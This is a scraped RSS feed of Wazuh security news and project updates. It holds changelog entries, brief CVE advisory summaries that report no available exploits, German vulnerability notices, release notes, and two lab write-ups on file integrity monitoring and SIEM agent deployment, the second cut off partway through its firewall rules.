<li>Add new indexer API roles mapping by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4910791091" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37746" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37746/hovercard" href="https://github.com/wazuh/wazuh/pull/37746">#37746</a></li>
<li>Fix Windows block-ip firewall-enabled check misfire and ineffective route fallback by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4821040019" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37430" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37430/hovercard" href="https://github.com/wazuh/wazuh/pull/37430">#37430</a></li>
<li>Free rpm macro context to stop unbounded growth by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4916015744" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37758" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37758/hovercard" href="https://github.com/wazuh/wazuh/pull/37758">#37758</a></li>
<li>Report modulesSync failure as debug during agent shutdown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anromerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anromerom">@anromerom</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4886452693" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37689" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37689/hovercard" href="https://github.com/wazuh/wazuh/pull/37689">#37689</a></li>
<li>Report manager-not-ready sync failures as deferred by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anromerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anromerom">@anromerom</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4894783919" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37720" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37720/hovercard" href="https://github.com/wazuh/wazuh/pull/37720">#37720</a></li>
<li>wazuh-engine: Indexer connector exponential backoff by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matigarciadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matigarciadev">@matigarciadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4914391566" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37756" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37756/hovercard" href="https://github.com/wazuh/wazuh/pull/37756">#37756</a></li>
<li>Fix issue reference in the daemons stats changelog entry by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4938483459" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37827" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37827/hovercard" href="https://github.com/wazuh/wazuh/pull/37827">#37827</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/wazuh/wazuh/compare/v5.0.0-beta3...v5.0.0-beta4"><tt>v5.0.0-beta3...v5.0.0-beta4</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-33754 | Wazuh up to 4.14.4 Cluster Protocol Parser memory allocation (WID-SEC-2026-2377)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in Wazuh up to 4.14.4. This affects an unknown part of the component Cluster Protocol Parser. Performing a manipulation results in uncontrolled memory allocation.

This vulnerability is cataloged as CVE-2026-33754. It is possible to initiat...]]></description>
<link>https://tsecurity.de/de/3682891/sicherheitsluecken/cve-2026-33754-wazuh-up-to-4144-cluster-protocol-parser-memory-allocation-wid-sec-2026-2377/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682891/sicherheitsluecken/cve-2026-33754-wazuh-up-to-4144-cluster-protocol-parser-memory-allocation-wid-sec-2026-2377/</guid>
<pubDate>Tue, 21 Jul 2026 09:09:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.14.4</a>. This affects an unknown part of the component <em>Cluster Protocol Parser</em>. Performing a manipulation results in uncontrolled memory allocation.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-33754">CVE-2026-33754</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-28220 | Wazuh up to 4.14.4 Cluster Distributed API common.py as_wazuh_object rbac_permissions deserialization (WID-SEC-2026-2377)]]></title>
<description><![CDATA[A vulnerability was found in Wazuh up to 4.14.4 and classified as very critical. This vulnerability affects the function as_wazuh_object of the file framework/wazuh/core/cluster/common.py of the component Cluster Distributed API. Such manipulation of the argument rbac_permissions leads to deseria...]]></description>
<link>https://tsecurity.de/de/3682890/sicherheitsluecken/cve-2026-28220-wazuh-up-to-4144-cluster-distributed-api-commonpy-aswazuhobject-rbacpermissions-deserialization-wid-sec-2026-2377/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682890/sicherheitsluecken/cve-2026-28220-wazuh-up-to-4144-cluster-distributed-api-commonpy-aswazuhobject-rbacpermissions-deserialization-wid-sec-2026-2377/</guid>
<pubDate>Tue, 21 Jul 2026 09:08:59 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.14.4</a> and classified as <a href="https://vuldb.com/kb/risk">very critical</a>. This vulnerability affects the function <code>as_wazuh_object</code> of the file <em>framework/wazuh/core/cluster/common.py</em> of the component <em>Cluster Distributed API</em>. Such manipulation of the argument <em>rbac_permissions</em> leads to deserialization.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-28220">CVE-2026-28220</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-33434 | Wazuh up to 4.14.4 CheckRateLimitsMiddleware CheckRateLimitsMiddleware.dispatch injection]]></title>
<description><![CDATA[A vulnerability categorized as very critical has been discovered in Wazuh up to 4.14.4. Affected by this issue is the function CheckRateLimitsMiddleware.dispatch of the component CheckRateLimitsMiddleware. Such manipulation leads to injection.

This vulnerability is listed as CVE-2026-33434. The ...]]></description>
<link>https://tsecurity.de/de/3680842/sicherheitsluecken/cve-2026-33434-wazuh-up-to-4144-checkratelimitsmiddleware-checkratelimitsmiddlewaredispatch-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680842/sicherheitsluecken/cve-2026-33434-wazuh-up-to-4144-checkratelimitsmiddleware-checkratelimitsmiddlewaredispatch-injection/</guid>
<pubDate>Mon, 20 Jul 2026 12:24:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">very critical</a> has been discovered in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.14.4</a>. Affected by this issue is the function <code>CheckRateLimitsMiddleware.dispatch</code> of the component <em>CheckRateLimitsMiddleware</em>. Such manipulation leads to injection.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-33434">CVE-2026-33434</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-40106 | Wazuh up to 4.14.4 Syscheck wazuh-agent.exe out-of-bounds write]]></title>
<description><![CDATA[A vulnerability was found in Wazuh up to 4.14.4. It has been declared as problematic. This affects an unknown part of the file wazuh-agent.exe of the component Syscheck. Such manipulation leads to out-of-bounds write.

This vulnerability is referenced as CVE-2026-40106. The attack can only be per...]]></description>
<link>https://tsecurity.de/de/3680841/sicherheitsluecken/cve-2026-40106-wazuh-up-to-4144-syscheck-wazuh-agentexe-out-of-bounds-write/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680841/sicherheitsluecken/cve-2026-40106-wazuh-up-to-4144-syscheck-wazuh-agentexe-out-of-bounds-write/</guid>
<pubDate>Mon, 20 Jul 2026 12:24:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.14.4</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown part of the file <em>wazuh-agent.exe</em> of the component <em>Syscheck</em>. Such manipulation leads to out-of-bounds write.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-40106">CVE-2026-40106</a>. The attack can only be performed from a local environment. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-44251 | Wazuh up to 4.14.4 Message Processing os_crypto/shared/msgs.c integer underflow]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Wazuh up to 4.14.4. This issue affects some unknown processing of the file os_crypto/shared/msgs.c of the component Message Processing. The manipulation leads to integer underflow.

This vulnerability is documented as CVE-2026-44251. The att...]]></description>
<link>https://tsecurity.de/de/3680839/sicherheitsluecken/cve-2026-44251-wazuh-up-to-4144-message-processing-oscryptosharedmsgsc-integer-underflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680839/sicherheitsluecken/cve-2026-44251-wazuh-up-to-4144-message-processing-oscryptosharedmsgsc-integer-underflow/</guid>
<pubDate>Mon, 20 Jul 2026 12:24:17 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/wazuh">Wazuh up to 4.14.4</a>. This issue affects some unknown processing of the file <em>os_crypto/shared/msgs.c</em> of the component <em>Message Processing</em>. The manipulation leads to integer underflow.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-44251">CVE-2026-44251</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-56401 | Wazuh up to 5.0.0-beta2 FlatBuffer DataValue ID null pointer dereference]]></title>
<description><![CDATA[Further investigation has shown that this issues is a false-positive. Please review the sources mentioned and consider not using this entry at all.]]></description>
<link>https://tsecurity.de/de/3677427/sicherheitsluecken/cve-2026-56401-wazuh-up-to-500-beta2-flatbuffer-datavalue-id-null-pointer-dereference/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677427/sicherheitsluecken/cve-2026-56401-wazuh-up-to-500-beta2-flatbuffer-datavalue-id-null-pointer-dereference/</guid>
<pubDate>Sat, 18 Jul 2026 06:08:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Further investigation has shown that this issues is a false-positive. Please review the sources mentioned and consider not using this entry at all.]]></content:encoded>
</item>
<item>
<title><![CDATA[coverity-w29-4.14.7: Merge pull request #37545 from wazuh/fix/887-hp-ux-compilation-error]]></title>
<description><![CDATA[Compilation error in HP-UX arch]]></description>
<link>https://tsecurity.de/de/3673894/it-security-tools/coverity-w29-4147-merge-pull-request-37545-from-wazuhfix887-hp-ux-compilation-error/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673894/it-security-tools/coverity-w29-4147-merge-pull-request-37545-from-wazuhfix887-hp-ux-compilation-error/</guid>
<pubDate>Thu, 16 Jul 2026 17:03:59 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Compilation error in HP-UX arch</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [hoch] Wazuh: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Wazuh ausnutzen, um seine Privilegien zu erhöhen, um einen Denial of Service Angriff durchzuführen, um Informationen offenzulegen, und um Sicherheitsvorkehrungen zu umgehen.]]></description>
<link>https://tsecurity.de/de/3673284/it-security-nachrichten/neu-hoch-wazuh-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673284/it-security-nachrichten/neu-hoch-wazuh-mehrere-schwachstellen/</guid>
<pubDate>Thu, 16 Jul 2026 13:40:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein Angreifer kann mehrere Schwachstellen in Wazuh ausnutzen, um seine Privilegien zu erhöhen, um einen Denial of Service Angriff durchzuführen, um Informationen offenzulegen, und um Sicherheitsvorkehrungen zu umgehen.]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [mittel] Wazuh: Schwachstelle ermöglicht Denial of Service]]></title>
<description><![CDATA[Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Wazuh ausnutzen, um einen Denial of Service Angriff durchzuführen.]]></description>
<link>https://tsecurity.de/de/3656603/it-security-nachrichten/neu-mittel-wazuh-schwachstelle-ermoeglicht-denial-of-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656603/it-security-nachrichten/neu-mittel-wazuh-schwachstelle-ermoeglicht-denial-of-service/</guid>
<pubDate>Thu, 09 Jul 2026 12:05:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Wazuh ausnutzen, um einen Denial of Service Angriff durchzuführen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v4.14.7-rc1]]></title>
<description><![CDATA[Manager
Removed

Removed deprecated wazuh-dbd daemon and database_output configuration. (#37035)

Fixed

Improved cluster payload buffer allocation strategy. (#37280)
Improved cluster archive decompression limits. (#37119)
Improved cluster worker file path validation. (#36998)
Improved API authen...]]></description>
<link>https://tsecurity.de/de/3656516/it-security-tools/wazuh-v4147-rc1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656516/it-security-tools/wazuh-v4147-rc1/</guid>
<pubDate>Thu, 09 Jul 2026 11:33:48 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Manager</h3>
<h4>Removed</h4>
<ul>
<li>Removed deprecated wazuh-dbd daemon and database_output configuration. (<a href="https://github.com/wazuh/wazuh/pull/37035" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37035/hovercard">#37035</a>)</li>
</ul>
<h4>Fixed</h4>
<ul>
<li>Improved cluster payload buffer allocation strategy. (<a href="https://github.com/wazuh/wazuh/pull/37280" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37280/hovercard">#37280</a>)</li>
<li>Improved cluster archive decompression limits. (<a href="https://github.com/wazuh/wazuh/pull/37119" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37119/hovercard">#37119</a>)</li>
<li>Improved cluster worker file path validation. (<a href="https://github.com/wazuh/wazuh/pull/36998" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36998/hovercard">#36998</a>)</li>
<li>Improved API authentication stability with bounded thread pools, regex timeouts and payload size limits. (<a href="https://github.com/wazuh/wazuh/pull/37034" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37034/hovercard">#37034</a>)</li>
<li>Updated <code>aiohttp</code>, <code>cryptography</code>, <code>PyJWT</code>, <code>python-multipart</code> and <code>starlette</code> Python dependencies. (<a href="https://github.com/wazuh/wazuh/pull/37361" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37361/hovercard">#37361</a>)</li>
</ul>
<h3>Agent</h3>
<h4>Fixed</h4>
<ul>
<li>Fixed AWS SQS subscriber wodle resolving the wrong AWS account for cross-account <code>iam_role_arn</code> configurations. (<a href="https://github.com/wazuh/wazuh/pull/36791" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36791/hovercard">#36791</a>)</li>
<li>Fixed agent keepalive scheduling after a system clock rollback causing false <code>Disconnected</code> status. (<a href="https://github.com/wazuh/wazuh/pull/36338" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36338/hovercard">#36338</a>)</li>
<li>Fixed eBPF FIM whodata dropping file events on older kernels such as Amazon Linux 2 and 2023. (<a href="https://github.com/wazuh/wazuh/pull/37014" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37014/hovercard">#37014</a>)</li>
<li>Fixed eBPF FIM whodata missing file move/rename events into monitored folders. (<a href="https://github.com/wazuh/wazuh/pull/37023" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37023/hovercard">#37023</a>)</li>
<li>Added IP address validation to the <code>ip-customblock</code> active response to prevent malformed input in file path operations. (<a href="https://github.com/wazuh/wazuh/pull/36730" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36730/hovercard">#36730</a>)</li>
<li>Added a null check for inode and device fields in the FIM whodata event handler. (<a href="https://github.com/wazuh/wazuh/pull/37245" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37245/hovercard">#37245</a>)</li>
</ul>
<h3>Ruleset</h3>
<h4>Fixed</h4>
<ul>
<li>Fixed multiple Debian, Ubuntu and Windows SCA checks generating incorrect results. (<a href="https://github.com/wazuh/wazuh/pull/37385" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37385/hovercard">#37385</a>)</li>
<li>Fixed a typo in the SELinux SCA check causing false failures on CentOS 8, 9 and 10 systems configured as <code>permissive</code>. (<a href="https://github.com/wazuh/wazuh/pull/36361" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36361/hovercard">#36361</a>)</li>
<li>Fixed the AlmaLinux 9 and 10 bootloader permissions SCA check regex and optional file handling. (<a href="https://github.com/wazuh/wazuh/pull/36396" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36396/hovercard">#36396</a>)</li>
<li>Fixed the <code>/etc/gshadow-</code> permissions SCA check always failing due to an incorrect <code>all</code> condition. (<a href="https://github.com/wazuh/wazuh/pull/36795" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36795/hovercard">#36795</a>)</li>
<li>Fixed a macOS SCA PolicyBanner check false failure by wrapping the command in <code>sh -c</code> for glob expansion. (<a href="https://github.com/wazuh/wazuh/pull/36783" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36783/hovercard">#36783</a>)</li>
</ul>
<h3>RESTful API</h3>
<h4>Fixed</h4>
<ul>
<li>Fixed TypeError when sorting agents by version with empty version strings. (<a href="https://github.com/wazuh/wazuh/pull/37323" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37323/hovercard">#37323</a>)</li>
<li>Improved sensitive data masking in cluster configuration endpoint. (<a href="https://github.com/wazuh/wazuh/pull/37039" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37039/hovercard">#37039</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[coverity-w28-4.14.7: Merge pull request #37523 from wazuh/enhancement/wqa8102-bump-4.14.7]]></title>
<description><![CDATA[Bump 4.14.7 branch]]></description>
<link>https://tsecurity.de/de/3655314/it-security-tools/coverity-w28-4147-merge-pull-request-37523-from-wazuhenhancementwqa8102-bump-4147/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655314/it-security-tools/coverity-w28-4147-merge-pull-request-37523-from-wazuhenhancementwqa8102-bump-4147/</guid>
<pubDate>Wed, 08 Jul 2026 21:33:39 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Bump 4.14.7 branch</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh File Integrity Monitoring: Tracking Endpoint Modifications in Real Time]]></title>
<description><![CDATA[OverviewIn this project, I implemented File Integrity Monitoring (FIM) using Wazuh to detect file system and Windows Registry changes in a lab environment. Custom FIM rules was configured to monitor user directories and registry Run keys, then validated the setup by manually creating, modifying, ...]]></description>
<link>https://tsecurity.de/de/3647963/hacking/wazuh-file-integrity-monitoring-tracking-endpoint-modifications-in-real-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647963/hacking/wazuh-file-integrity-monitoring-tracking-endpoint-modifications-in-real-time/</guid>
<pubDate>Mon, 06 Jul 2026 08:52:56 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Overview</h3><p>In this project, I implemented File Integrity Monitoring (FIM) using Wazuh to detect file system and Windows Registry changes in a lab environment. Custom FIM rules was configured to monitor user directories and registry Run keys, then validated the setup by manually creating, modifying, and deleting files and folders, and by running a benign malware simulation that triggered Windows processes leading to registry updates. This demonstrated how FIM detects not only direct malicious modifications but also related system-level activity that occurs during suspicious endpoint behavior, supporting incident investigation and root-cause analysis.</p><p>File Integrity Monitoring (FIM) is a security control used to track changes made to files and system configurations. It helps detect when files are created, modified, or deleted, and when critical system areas like the Windows Registry are altered. Since many attacks rely on changing files or registry keys to maintain persistence or evade detection, FIM provides an important layer of visibility into what’s happening on an endpoint. For this project, i used Windows endpoint.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IgesWE_x72ThLyu7T2u6Zg.jpeg"></figure><p>You can read more about File Integrity Monitoring in official Wazuh Documentation <a href="https://documentation.wazuh.com/current/user-manual/capabilities/file-integrity/how-to-configure-fim.html">here</a></p><h3>Configuration &amp; Detection</h3><ol><li><strong>Edit the agent’s ossec.conf file</strong></li></ol><ul><li>On the Windows endpoint, the Wazuh agent configuration file is located at</li></ul><pre>C:\Program Files (x86)\ossec-agent\ossec.conf</pre><p>and edit the ossec.conf file using notepad (open as an administrator).</p><ul><li>Add the directories you want to monitor within the &lt;syscheck&gt; block</li></ul><pre>&lt;directories check_all="yes" report_changes="yes" realtime="yes"&gt;C:\Users\Public&lt;/directories&gt;<br>&lt;directories check_all="yes" report_changes="yes" realtime="yes"&gt;C:\Users\Public\Downloads&lt;/directories&gt;<br>&lt;directories check_all="yes" report_changes="yes" realtime="yes"&gt;C:\Users\Lily\Desktop&lt;/directories&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*FvCOZ9zsrpNFIJueyym_mg.jpeg"><figcaption>ossec.conf</figcaption></figure><ul><li>Restart the Wazuh agent to apply changes</li></ul><pre>Restart-Service wazuh-agent</pre><p><strong>2. Test the Configuration</strong></p><ul><li><strong>Create files</strong></li></ul><p>I created a file on Desktop named “Malware Docs”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/309/1*t2EqYJ5s-CzT5CPjy3XF7Q.jpeg"></figure><p><strong>Alert Visualization</strong></p><p>Navigate to Endpoint security &gt; File Integrity Monitoring &gt; Events on the Wazuh dashboard to view the alert generated when the FIM module detects changes in the monitored file. The created file was logged as ‘file added’</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*GovN3S1Zqm5TfSX4swCExw.jpeg"><figcaption>files created</figcaption></figure><ul><li><strong>Modify Files</strong></li></ul><p>To demonstrate file modification detection, I edited the contents of a file in the Downloads folder named “Malicious.txt”</p><p><strong>Alert Visualization</strong></p><p>This action was detected by Wazuh File Integrity Monitoring and logged as a “file modification” event in the dashboard.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*U69WhITQ5XSQt_M2gCvdEw.jpeg"><figcaption>file modified</figcaption></figure><ul><li><strong>Delete Files</strong></li></ul><p>Several files were deleted, and this activity was detected by Wazuh File Integrity Monitoring and logged as “File deleted” events.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*d5uYJbK7Lj43OfFAV4yLBQ.jpeg"><figcaption>files deleted</figcaption></figure><ul><li><strong>Registry Modification</strong></li></ul><p>To demonstrate registry monitoring, I ran a benign malware simulation that attempted to establish persistence. This action triggered legitimate Windows system processes, which in turn updated related registry keys in the background. Wazuh detected these changes and logged them as registry modification events, demonstrating how File Integrity Monitoring can capture both direct malware activity and the secondary system behaviors it provokes.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WjRpltYtUzY_kx0L1hWpkg.jpeg"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xAQRxfW3ATRLAkQTG0PXFA.jpeg"></figure><h3>Dashboard Insights &amp; Key Takeaways</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BqYTVh5qn5LCmGvzoPlpMA.jpeg"><figcaption>FIM Dashboard</figcaption></figure><p>This project demonstrated the practical value of File Integrity Monitoring through hands-on configuration, testing, and analysis using Wazuh. I successfully monitored file systems and Windows Registry keys, validated detection with manual changes and a malware simulation, and used the Wazuh dashboard to turn raw alerts into actionable insights.</p><p>FIM proved to be a critical visibility tool not just for compliance, but for real-time detection, rapid investigation, and understanding attack behaviors through change analysis. By capturing both legitimate and malicious modifications, it serves as a foundational layer in a proactive security posture.</p><p>Many thanks to <a href="https://medium.com/u/f6fc6f913781">Efam Harris</a> for inspiring me to take on this project.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=269e384f3fa7" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/wazuh-file-integrity-monitoring-tracking-endpoint-modifications-in-real-time-269e384f3fa7">Wazuh File Integrity Monitoring: Tracking Endpoint Modifications in Real Time</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh SIEM Deployment with Multi-OS Agents]]></title>
<description><![CDATA[Project OverviewThis project demonstrates the deployment of Wazuh, an open-source, industry-recognized SIEM and host-based intrusion detection platform, in a virtualized lab environment. Wazuh was selected for this project due to its wide adoption in security operations, strong community support,...]]></description>
<link>https://tsecurity.de/de/3646307/hacking/wazuh-siem-deployment-with-multi-os-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646307/hacking/wazuh-siem-deployment-with-multi-os-agents/</guid>
<pubDate>Sun, 05 Jul 2026 08:22:33 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Project Overview</h3><p>This project demonstrates the deployment of Wazuh, an open-source,<strong> </strong>industry-recognized SIEM and host-based intrusion detection platform, in a virtualized lab environment. Wazuh was selected for this project due to its wide adoption in security operations, strong community support, and alignment with real-world SOC practices.</p><p>A Wazuh Manager was installed on an Ubuntu system and configured to centrally monitor three endpoints: Windows, Kali Linux, and Ubuntu. Each endpoint was successfully enrolled as a Wazuh agent and configured to forward system logs and security events to the manager for analysis.</p><p>The project validates end-to-end log collection and visibility through the Wazuh web dashboard, demonstrating how security events from multiple operating systems can be centrally analyzed. This setup reflects a realistic enterprise monitoring scenario and highlights the effectiveness of Wazuh as a cost-effective, open-source security monitoring solution used across modern SOC environments.</p><h3>Tools Used</h3><ul><li><strong>Wazuh SIEM (Open Source):</strong> Centralized security monitoring, log collection, and host-based intrusion detection platform</li><li><strong>Ubuntu Server: </strong>Hosting the Wazuh Manager, Indexer, and Web Dashboard</li><li><strong>Windows</strong> : Endpoint monitored using the Wazuh agent (Agent 1)</li><li><strong>Kali Linux: </strong>Linux endpoint monitored using the Wazuh agent (Agent 2)</li><li><strong>Ubuntu: </strong>Linux endpoint monitored using the Wazuh agent (Agent 3)</li><li><strong>VMware Workstation: </strong>Virtualization platform used to host all systems</li><li><strong>Web Browser (Windows): </strong>Used to access the Wazuh web dashboard over HTTPS</li></ul><h3><strong>Wazuh Deployment</strong></h3><p>Wazuh was deployed on Ubuntu Server using the official all-in-one installation script, following the Wazuh deployment guide. <a href="https://documentation.wazuh.com/current/quickstart.html">Read here</a></p><pre>curl -sO https://packages.wazuh.com/4.14/wazuh-install.sh &amp;&amp; sudo bash ./wazuh-install.sh -a</pre><p>This command installs all required dependencies along with the Wazuh Manager, Indexer, and Dashboard. Upon completion of the installation, a username and password are automatically generated for accessing the Wazuh web interface.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0AEIg9diazhMdLr1tFCj2Q.jpeg"></figure><h3><strong>Firewall Configuration</strong></h3><p>The firewall on the Wazuh server was configured to allow all Wazuh components to communicate properly, including agents, the dashboard, indexer, and Syslog. The following UFW rules were applied:</p><pre># Essential Wazuh ports<br>sudo ufw allow 1514/tcp   # Agent → Manager communication<br>sudo ufw allow 1515/tcp   # Agent 